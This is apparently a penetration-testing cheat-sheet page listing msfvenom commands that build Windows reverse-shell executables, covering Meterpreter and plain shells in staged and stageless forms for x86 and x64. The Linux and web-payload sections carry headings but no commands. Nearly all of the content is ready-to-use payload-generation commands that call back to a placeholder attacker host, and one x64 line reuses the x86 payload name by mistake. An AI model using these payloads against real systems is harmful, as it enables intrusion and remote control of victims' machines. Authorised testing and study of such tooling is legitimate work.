MSFVenom
Here are some of the popular payloads created using msfvenom,
Windows
Staged Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exeStageless Meterpreter
msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exeStaged Non-meterpreter
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exeStageless Non-meterpreter
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exeLinux
Staged Meterpreter
Stageless Meterpreter
Staged Non-Meterpreter
Stageless Non-Meterpreter
Web Payloads
Meterpreter
The output format for each line are asp, jsp, war and php.
Non-Meterpreter
The output format for each line are asp, jsp, war and php.
If the file is hta, then based on the operating system you may have to create a x64 or x86 file for reverse shell.
Other Resources
https://github.com/ksanchezcld/Hacking_Cheat_Sheet/blob/master/msfvenom
Last updated
Was this helpful?